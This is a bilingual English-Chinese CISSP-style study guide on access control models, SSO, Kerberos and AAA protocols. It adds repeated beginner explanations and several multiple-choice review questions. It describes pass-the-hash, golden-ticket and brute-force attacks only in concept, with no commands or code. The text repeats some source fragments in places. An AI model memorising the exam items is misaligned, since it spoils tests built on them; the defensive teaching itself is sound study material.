With the DAC model, all objects have owners, and the owners can modify permissions. Each object has an access control list defining permissions, such as read and modify for files. All other models are nondiscretionary models, and administrators centrally manage nondiscretionary controls. Describe key concepts of the role-based access control (RBAC) model. RBAC models use job roles, and users gain privileges when administrators place their accounts into a role or group. Taking a user out of a role removes the permissions granted through the role membership. Describe key concepts of the rule-based access control model.

Rule-based access control models use a set of rules, restrictions, or filters to determine access. A firewall's access control list includes a list of rules that define what access is allowed and what access is blocked. Describe key concepts of the attribute-based access control (ABAC) model. An ABAC model is an advanced implementation of a rule-based

中文直译 / 整理

加密和系统的时间同步来发放票据。 RADIUS 和 TACACS+ 是常见的身份验 证、授权和计费(AAA)协议。 访问控制攻击包括权限提升技术,以获取更多权利和权限。 密码是一种常见的 身份验证机制,多种类型的攻击试图破解密码。 密码攻击包括字典攻击、暴力 破解攻击、密码喷洒攻击、凭证填充攻击、生日攻击、彩虹表攻击、传递哈希 攻击、Kerberos利用攻击和嗅探攻击。 学习要点 识别常见的授权机制。 授权确保在给定已验证身份的权限下,所请求的活动或对 象访问是可能的。 例如,它确保具有适当权限的用户可以访问文件和其他资源。 常见的授权机制包括隐式拒绝、访问控制列表、访问控制矩阵、能力列表、受限 接口、内容相关控制和上下文相关控制。 这些机制强制执行安全原则,如按需知 晓、最小权限原则和职责分离。 描述自主访问控制(DAC)模型的关键概念。 在DAC模型中,所有对象都有所 有者,所有者可以修改权限。 每个对象都有一个访问控制列表,定义权限,例 如文件的读取和修改权限。 所有其他模型均为非自主模型,管理员集中管理非 自主控制。 描述基于角色的访问控制(RBAC)模型的关键概念。

RBAC 模型使用职位角色, 当管理员将用户的账户分配到某个角色或组时,用户便获得相应的权限。 将用户 从角色中移除会撤销通过角色成员资格授予的权限。 描述基于规则的访问控制模型的关键概念。 基于规则的访问控制模型使用一 组规则、限制或过滤器来确定访问权限。 防火墙的访问控制列表包含一组规 则,用于定义允许和阻止的访问权限。 描述基于属性的访问控制(ABAC)模型的关键概念。 ABAC模型是基于规则的

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:CIA 是目标,DAD 是失败表现,AAA 是访问控制和问责链。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

AAA 服务:AAA 常说认证、授权、记账,但完整链条还包括识别和审计。

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“DAD、过度保护、真实性、不可否认性与 AAA”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Identification 是声称身份,Authentication 是证明身份,Authorization 是允许做什么。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
AAA 服务 AAA 常说认证、授权、记账,但完整链条还包括识别和审计。
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
防火墙 防火墙根据规则控制网络流量进出。
学习单元 54 / PDF P1021

DAD、过度保护、真实性、不可否认性与 AAA

CIA 是目标,DAD 是失败表现,AAA 是访问控制和问责链。

教材原文段落

access control model, applying rules based on attributes. Software-defined networks (SDNs) often use an ABAC model. Describe key concepts of the mandatory access control (MAC) model. The MAC model uses labels to identify security domains. Subjects need matching labels to access objects. The MAC model enforces the need to know principle and supports a hierarchical environment, a compartmentalized environment, or a combination of both in a hybrid environment. It is frequently referred to as a lattice-based model. Describe key concepts of the risk-based access control model.

A risk-based access control model evaluates the environment and the situation and makes decisions based on software-based security policies. It can control access based on multiple factors such as a user's location, determined by IP addresses, whether the user has logged on with multifactor authentication, and the user's device. Advanced implementations can use machine learning to evaluate risk. Understand single sign-on methods used on the Internet. SSO is a mechanism that allows subjects to authenticate once and access multiple objects without authenticating again.

Security Assertion Markup Language (SAML) is an open XML-based standard used to exchange authentication and authorization information. OAuth 2.0 is an authorization framework described in RFC 6749 and supported by many online sites. OASIS maintains OpenID Connect (OIDC). OIDC provides both authentication and authorization by using the OAuth 2.0 framework and building on the OpenID standard. Describe Kerberos. Kerberos is the most common SSO method used within organizations. The primary purpose of Kerberos is authentication. It uses symmetric cryptography and tickets to prove identification and provide authentication.

One server synchronizes its time with a Network Time Protocol (NTP) server, and all clients within a network synchronize with the same time. Understand the purpose of AAA protocols. Several protocols provide centralized authentication, authorization, and accounting services. Network access (or remote access) systems use AAA protocols. For example, a network access server is a client to a RADIUS server, and the RADIUS server provides AAA services. RADIUS uses UDP and encrypts the password only. TACACS+ uses TCP and encrypts the entire session.

中文直译 / 整理

访问控制模型,根据属性应用规则。 软件定义网络(SDNs)通常使用ABAC模型。 描述强制访问控制(MAC)模型的关键概念。 MAC 模型使用标签来标识安全 域。 主体需要匹配的标签才能访问对象。 MAC 模型强制执行“需知”原则,并 支持分层环境、分区环境,或两者的混合环境。 它通常被称为基于格的模型。 描述基于风险的访问控制模型的关键概念。 基于风险的访问控制模型评估环境 和情境,并基于基于软件的安全策略做出决策。 它可以基于多个因素控制访问, 例如用户的地理位置(通过 IP 地址确定)、用户是否使用多因素认证登录,以 及用户的设备。 高级实现可以使用机器学习来评估风险。 了解互联网上使用的单点登录方法。 SSO 是一种允许主体进行一次身份验证后 即可访问多个对象而无需再次认证的机制。 安全断言标记语言(SAML)是一种 用于交换身份验证和授权信息的开放 XML 标准。 OAuth 2.0 是 RFC 6749 中描 述的授权框架,被许多在线网站支持。 OASIS 维护 OpenID Connect(OIDC)。 OIDC 通过使用 OAuth 2.0 框架并在 OpenID 标准基础上构建,提供身份验证 和授权功能。

描述Kerberos。 Kerberos是组织内最常用的单点登录(SSO)方法。 Kerberos的主要目的是身份验证。 它使用对称加密和票据来证明身份并提供 认证。 一台服务器与网络时间协议(NTP)服务器同步时间,网络中的所有 客户端均与同一时间源同步。 理解AAA协议的目的。 多种协议提供集中式的认证、授权和计费服务。 网络访 问(或远程访问)系统使用AAA协议。 例如,网络访问服务器是RADIUS服务器 的客户端,而RADIUS服务器提供AAA服务。 RADIUS使用UDP,仅加密密码。 TACACS+ 使用TCP,并加密整个会话。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:CIA 是目标,DAD 是失败表现,AAA 是访问控制和问责链。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

AAA 服务:AAA 常说认证、授权、记账,但完整链条还包括识别和审计。

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

分层:分层把控制按层排列,让攻击者必须连续突破。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“DAD、过度保护、真实性、不可否认性与 AAA”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Identification 是声称身份,Authentication 是证明身份,Authorization 是允许做什么。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

serial controls 更深,parallel controls 更宽;题目会考深度和广度。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
AAA 服务 AAA 常说认证、授权、记账,但完整链条还包括识别和审计。
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
分层 分层把控制按层排列,让攻击者必须连续突破。
加密 加密把内容变成未授权者看不懂的形式。
标准 标准给出必须满足的最低要求。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
学习单元 55 / PDF P1022

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

Describe privilege escalation. Attackers use privilege escalation techniques to gain additional privileges after exploiting a single system. They typically try to gain additional privileges on the exploited systems first. They can also reach other systems in a network and attempt to gain elevated privileges on them. Limiting privileges given to service accounts reduces the success of some privilege escalation attacks. Explain zero-trust principles. Zero-trust presumes that there is no trust boundary and no network edge. Instead, each action is validated when requested as part of a continuous authentication process, and access is only allowed after policies are checked.

The key components of a zero-trust architecture are the policy engine and policy administrator (which together are known as the policy decision point) and the policy enforcement point. Know about Kerberos exploitation attacks. Kerberos attacks attempt to exploit weaknesses in Kerberos tickets. In some attacks, they capture tickets held in the lsass.exe process and use them in pass the ticket attacks. A silver ticket grants the attacker all the privileges granted to a service account. Attackers can create golden tickets after obtaining the hash of the Kerberos service account (KRBTGT), giving them the ability to create tickets at will within Active Directory.

Know how brute-force and dictionary attacks work. Brute-force and dictionary attacks are carried out against a stolen password database file or the system's logon prompt. They are designed to discover passwords. In brute-force attacks, all possible combinations of keyboard characters are used, whereas a predefined list of possible passwords is used in a dictionary attack. Account lockout controls prevent their effectiveness against online attacks. Written Lab 1. Describe the primary difference between discretionary and nondiscretionary access control models. 2. List at least three standards used to provide single sign-on (SSO) capabilities on the Internet. 3.

Identify the PowerShell cmdlet that allows you to run PowerShell commands indirectly.

中文直译 / 整理

描述权限提升。 攻击者在利用单个系统后,会使用权限提升技术获取更多权限。 他们通常首先尝试在被利用的系统上获取更多权限。 他们还可以访问网络中的其 他系统,并尝试在这些系统上获取提升的权限。 限制服务账户的权限可以降低某 些权限提升攻击的成功率。 解释零信任原则。 零信任假设不存在信任边界和网络边缘。 相反,每个操作在请 求时都会作为持续身份验证过程的一部分进行验证,只有在检查策略后才允许访 问。 零信任架构的关键组件是策略引擎和策略管理员(二者共同称为策略决策点) 以及策略执行点。 了解Kerberos利用攻击。 Kerberos攻击试图利用Kerberos票据中的弱点。 在 某些攻击中,攻击者会捕获存储在lsass.exe进程中的票据,并在“传递票据” 攻击中使用它们。 银票授予攻击者服务账户所拥有的所有权限。 攻击者在获取 Kerberos服务账户(KRBTGT)的哈希值后,可以创建金票,从而在Active Directory内随意创建票据。 了解暴力破解和字典攻击的工作原理。 暴力破解和字典攻击针对被盗的密码数据 库文件或系统的登录提示进行。 它们旨在发现密码。 在暴力破解攻击中,使用所 有可能的键盘字符组合;

而在字典攻击中,则使用预定义的可能密码列表。 账户 锁定机制可防止这些攻击在在线攻击中生效。 实验题 1. 描述自由裁量访问控制模型与非自由裁量访问控制模型的主要 区别。 2. 列出至少三种用于在互联网上提供单点登录(SSO)功能的标准。 3. 指出允许你间接运行 PowerShell 命令的 PowerShell cmdlet。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

标准:标准给出必须满足的最低要求。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

Minimum level、mandatory requirement 常对应 standard。

哈希本身不提供机密性;它主要用于完整性校验。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
身份 身份是主体在系统中的标识。
零信任 零信任默认不信任任何访问请求,需要持续验证和最小权限。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 56 / PDF P1023

章末总结与练习题

章末内容用来反查自己是否真的理解,而不是只背答案。

教材原文段落

4. Name a tool that is commonly used in the pass the hash and Kerberos exploitation attacks for privilege escalation. Review Questions 1. Which of the following best describes an implicit deny principle? A. All actions that are not expressly denied are allowed. B. All actions that are not expressly allowed are denied. C. All actions must be expressly denied. D. None of the above. 2. A table includes multiple objects and subjects, and it identifies the specific access each subject has to different objects. What is this table? A. Access control list B. Access control matrix C. Federation D. Creeping privilege 3.

You are reviewing access control models and want to implement a model that allows the owner of an object to grant privileges to other users. Which of the following meets this requirement? A. Mandatory access control (MAC) model B. Discretionary access control (DAC) model C. Role-based access control (RBAC) model D. Rule-based access control model 4. Which of the following access control models allow the owner of data to modify permissions? A. Discretionary access control (DAC) B. Mandatory access control (MAC) C. Rule-based access control D. Risk-based access control 4.

中文直译 / 整理

列出一种常用于传递哈希和Kerberos攻击中提升权限的工具。 复习问题 1. 以下哪一项最准确地描述了隐式拒绝原则? A. 所有未明确拒绝的操作均被允许。 B. 所有未明确允许的操作均被拒绝。 C. 所有操作都必须明确拒绝。 D. 以上都不是。 2. 一张表包含多个主体和客体,并标识每个主体对不同客体的具体访问权限。 这张表是什么? A. 访问控制列表 B. 访问控制矩阵 C. 联邦 D. 权限蔓延 3. 您正在审查访问控制模型,并希望实施一种允许对象所有者向其他用户授 予权限的模型。 以下哪项满足此要求? A. 强制访问控制(MAC)模型 B. 自主访问控制(DAC)模型 C. 基于角色的访问控制(RBAC)模型 D. 基于规则的访问控制模型 4. 以下哪种访问控制模型允许数据所有者修改权限? A. 自主访问控制(DAC) B. 强制访问控制(MAC) C. 基于规则的访问控制 D. 基于风险的访问控制

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:章末内容用来反查自己是否真的理解,而不是只背答案。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

数据所有者:数据所有者决定数据分类、保护要求和访问规则。

数据所有者:数据所有者负责决定数据分类、访问规则和保护要求。

哈希:哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。

基于角色的访问控制 RBAC:RBAC 按角色分配权限,适合岗位清晰的组织。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“章末总结与练习题”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Owner 定规则,Custodian 执行保护。

Owner 决策,Custodian 执行,User 按授权使用。

哈希本身不提供机密性;它主要用于完整性校验。

角色、岗位、职责分离常对应 RBAC。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
数据所有者 数据所有者决定数据分类、保护要求和访问规则。
数据所有者 数据所有者负责决定数据分类、访问规则和保护要求。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
基于角色的访问控制 RBAC RBAC 按角色分配权限,适合岗位清晰的组织。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
自主访问控制 DAC DAC 由对象所有者决定谁能访问。
学习单元 57 / PDF P1024

第 1024 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

5. A central authority determines which files a user can access based on the organization's hierarchy. Which of the following best describes this? A. DAC model B. An access control list (ACL) C. Rule-based access control model D. RBAC model 6. Which of the following statements is true related to the RBAC model? A. An RBAC model allows users membership in multiple groups. B. An RBAC model allows users membership in a single group. C. An RBAC model is nonhierarchical. D. An RBAC model uses labels. 7. You are reviewing different access control models. Which of the following best describes a rule-based access control model? A. It uses local rules applied to users individually. B.

It uses global rules applied to users individually. C. It uses local rules applied to all users equally. D. It uses global rules applied to all users equally. 8. Your organization is considering deploying a software-defined network (SDN) in the data center. Which of the following access control models is commonly used in an SDN? A. Mandatory access control (MAC) model B. Attribute-based access control (ABAC) model C. Role-based access control (RBAC) model D. Discretionary access control (DAC) model 9. The MAC model supports different environment types. Which of the following grants users access using predefined labels for subjects and objects? A. Compartmentalized environment B.

Hierarchical environment 5.

中文直译 / 整理

一个中央权威机构根据组织的层级结构确定用户可以访问哪些文件。 以下哪一 项最能描述这一点? A. DAC 模型 B. 访问控制列表(ACL) C. 基于规则的访问控制模型 D. RBAC 模型 6. 以下关于 RBAC 模型的陈述哪一项是正确的? A. RBAC 模型允许用户属于多个组。 B. RBAC 模型允许用户属于单个组。 C. RBAC 模型是非层级的。 D. RBAC 模型使用标签。 7. 您正在审查不同的访问控制模型。 以下哪一项 最能描述基于规则的 访问控制模型? A. 它使用应用于单个用户的本地规则。 B. 它使用应用于每个用户的全局规则。 C. 它使用应用于所有用户的本地规则。 D. 它使用应用于所有用户的全局规则。 8. 您的组织正在考虑在数据中心部署软件定义网络(SDN)。 以下哪种访问 控制模型常用于SDN? A. 强制访问控制(MAC)模型 B. 基于属性的访问控制(ABAC)模型 C. 基于角色的访问控制(RBAC)模型 D. 自主访问控制(DAC)模型 9. MAC 模型支持不同的环境类型。 以下哪项使用预定义的主体和对象标 签来授予用户访问权限? A. 分区环境 B. 层次环境

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

基于角色的访问控制 RBAC:RBAC 按角色分配权限,适合岗位清晰的组织。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

自主访问控制 DAC:DAC 由对象所有者决定谁能访问。

基于属性的访问控制 ABAC:ABAC 根据用户、资源、环境等属性动态决策。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1024 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

角色、岗位、职责分离常对应 RBAC。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

文件所有者授权、ACL 常见于 DAC。

上下文、属性、策略引擎、动态访问常对应 ABAC。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
基于角色的访问控制 RBAC RBAC 按角色分配权限,适合岗位清晰的组织。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
自主访问控制 DAC DAC 由对象所有者决定谁能访问。
基于属性的访问控制 ABAC ABAC 根据用户、资源、环境等属性动态决策。
学习单元 58 / PDF P1025

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

C. Centralized environment D. Hybrid environment 10. Which of the following access control models identifies the upper and lower bounds of access for subjects with labels? A. Nondiscretionary access control B. Mandatory access control (MAC) C. Discretionary access control (DAC) D. Attribute-based access control (ABAC) 11. Which of the following access control models uses labels and is commonly referred to as a lattice-based model? A. DAC B. Nondiscretionary C. MAC D. RBAC 12. Management wants users to use multifactor authentication any time they access cloud-based resources. Which of the following access control models can meet this requirement? A. Risk-based access control B.

Mandatory access control (MAC) C. Role-based access control (RBAC) D. Discretionary access control (DAC) 13. Which of the following access control models determines access based on the environment and the situation? A. Risk-based access control B. Mandatory access control (MAC) C. Role-based access control (RBAC) D. Attribute-based access control (ABAC) 14. A cloud-based provider has implemented an SSO technology using JSON Web Tokens. The tokens provide authentication information and include user profiles. Which of the following best identifies this technology? C.

中文直译 / 整理

集中式环境 D. 混合环境 10. 以下哪种访问控制模型通过标签识别主体的访问上下限? A. 非自主访问控制 B. 强制访问控制(MAC) C. 自主访问控制(DAC) D. 基于属性的访问控制(ABAC) 11. 以下哪种访问控制模型使用标签,并通常被称为基于格的模型? A. DAC B. 非自主性 C. MAC D. RBAC 12. 管理层希望用户在访问云资源时始终使用多因素认证。 以下哪种访问控制 模型可以满足此要求? A. 基于风险的访问控制 B. 强制访问控制(MAC) C. 基于角色的访问控制(RBAC) D. 自主访问控制(DAC) 13. 以下哪种访问控制模型根据环境和情况确定访问权限? A. 基于风险的访问控制 B. 强制访问控制(MAC) C. 基于角色的访问控制(RBAC) D. 基于属性的访问控制(ABAC) 14. 一种基于云的提供商已实施了使用 JSON Web 令牌的单点登录(SSO)技术 令牌 p提供身份验证信息并包含 用户配置文件。 以下哪一项最能标识这项技术?

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

身份:身份是主体在系统中的标识。

多因素认证:MFA 使用至少两类不同认证因素,提高认证可信度。

基于角色的访问控制 RBAC:RBAC 按角色分配权限,适合岗位清晰的组织。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

身份管理题要区分识别、认证、授权、审计。

知道的、拥有的、固有的、所处位置、行为特征是常见因素。

角色、岗位、职责分离常对应 RBAC。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
身份 身份是主体在系统中的标识。
多因素认证 MFA 使用至少两类不同认证因素,提高认证可信度。
基于角色的访问控制 RBAC RBAC 按角色分配权限,适合岗位清晰的组织。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
自主访问控制 DAC DAC 由对象所有者决定谁能访问。
基于属性的访问控制 ABAC ABAC 根据用户、资源、环境等属性动态决策。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 59 / PDF P1026

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

A. OIDC B. OAuth C. SAML D. TLS 15. Some users in your network are having problems authenticating with a Kerberos server. While troubleshooting the problem, you verified you can log into your regular work computer. However, you are unable to log into the user's computer with your credentials. Which of the following is most likely to solve this problem? A. Advanced Encryption Standard (AES) B. Network Access Control (NAC) C. Security Assertion Markup Language (SAML) D. Network Time Protocol (NTP) 16. Your organization has a large network supporting thousands of employees, and it utilizes Kerberos. Of the following choices, what is the primary purpose of Kerberos? A. Confidentiality B.

Integrity C. Authentication D. Accountability 17. What is the function of the network access server within a RADIUS architecture? A. Authentication server B. Client C. AAA server D. Firewall 18. Larry manages a Linux server. Occasionally, he needs to run commands that require root-level privileges. Management wants to ensure that an attacker cannot run these commands if the attacker compromises Larry's account. Which of the following is the best choice? A. Grant Larry sudo access. A. OIDC B. OAuth C. SAML D. TLS 15.

中文直译 / 整理

您网络中的某些用户在使用 Kerberos 服务器进行身份验证时遇到问题。 在排查问题时,您确认可以登录到自己的常规工作计算机。 但是,您无法使 用您的凭据登录到用户的计算机。 以下哪项最有可能解决此问题? A. 高级加密标准 (AES) B. 网络访问控制 (NAC) C. 安全断言标记语言(SAML) D. 网络时间协议(NTP) 16. 您的组织拥有一个支持数千名员工的大型网络,并使用Kerberos。 以下 选项中,Kerberos的主要目的是什么? A. 机密性 B. 完整性 C. 身份验证 D. 责任 17. 在 RADIUS 架构中,网络访问服务器的功能是什么? A. 认证服务器 B. 客户端 C. AAA 服务器 D. 防火墙 18. 拉里管理一台Linux服务器。 偶尔,他需要运行需要root权限的命令。 管 理层希望确保,如果攻击者入侵了拉里的账户,也无法运行这些命令。 以下哪 一项是最佳选择? A. 授予拉里sudo访问权限。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

AAA 服务:AAA 常说认证、授权、记账,但完整链条还包括识别和审计。

认证:认证是验证“你是不是你声称的那个人”。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

Identification 是声称身份,Authentication 是证明身份,Authorization 是允许做什么。

密码、令牌、生物特征、多因素认证都服务认证。

问责依赖识别、认证、授权、审计和记账共同工作。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
AAA 服务 AAA 常说认证、授权、记账,但完整链条还包括识别和审计。
认证 认证是验证“你是不是你声称的那个人”。
问责性 问责性要求能把行为绑定到具体主体。
加密 加密把内容变成未授权者看不懂的形式。
标准 标准给出必须满足的最低要求。
防火墙 防火墙根据规则控制网络流量进出。
学习单元 60 / PDF P1027

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

B. Give Larry the root password. C. Add Larry's account to the Administrators group. D. Add Larry's account to the LocalSystem account. 19. An attacker used a tool to exploit a weakness in NTLM. They identified an administrator's user account. Although the attacker didn't discover the administrator's password, they did access remote systems by impersonating the administrator. Which of the following best identifies this attack? A. Pass the ticket B. Golden ticket C. Rainbow table D. Pass the hash 20. Your organization recently suffered a major data breach. After an investigation, security analysts discovered that attackers were using golden tickets to access network resources.

